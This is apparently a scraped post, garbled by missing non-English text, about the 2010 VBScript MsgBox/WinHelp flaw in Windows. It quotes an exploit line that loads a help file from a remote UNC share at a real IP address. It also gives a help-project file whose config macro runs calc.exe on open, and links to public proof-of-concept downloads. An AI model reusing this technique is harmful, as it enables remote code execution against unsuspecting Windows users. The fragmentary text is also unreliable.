VBScript MsgBox() Microsoft Windows. . |
|
Proof-of-Concept is available here: http://isec.pl/poc-isec27/- winhlp32.exe , Calc.exe : big = "\\184.73.14.110\PUBLIC\test.hlp" =\ , http://www.exploit-db.com/exploits/11615 :
=============================================================== A copy of test.hlp can be downloaded from here: http://www.exploit-db.com/sploits/msgbox_test_help.zip ===============================================================, - ! ! ?.. : HelpScribble. .hlp . ! , , test.hlp. - test.rtf test.hpj. - , :
[OPTIONS]
LCID=0x409 0x0 0x0
COMPRESS=0
[CONFIG]
EF("C:\\WINDOWS\\calc.exe",`',1)
[FILES]
TEST.RTF
[MAP]
21KSYK4 1
- http://www.stcsig.org/oi/hyperviews/resources/winhelp_faq/whfaq_qa.htm
[3.1.8] Can I link to a URL (web site) from a help file? How?
There are a number of DLLs available for launching a web browser and displaying a web page. The DLLs are good when users don't have a default browser specified. If your users are relatively up to date, you can get away with a simple macro:
ExecFile(`http://www.mysite.net/default.html',,0,)
will usually do the trick. Both Netscape and Microsoft browsers will set up the files needed to launch a URL from the command line. The ExecFile macro just takes advantage of this capability. (Hint: From the Start menu, select Run, and then enter a URL. Click OK, and your browser should launch directly to the page you specified.)
...- http://help.adobe.com/en_US/RoboHelp/Rword/7.0/mer...ELP_ExecFile_WinHelp_macro.htm
! =) .
: windows microsoft vbscript temporary vulnerability winhelp |
08.08.2007 11:40:00 |
|
|
| : | [1] |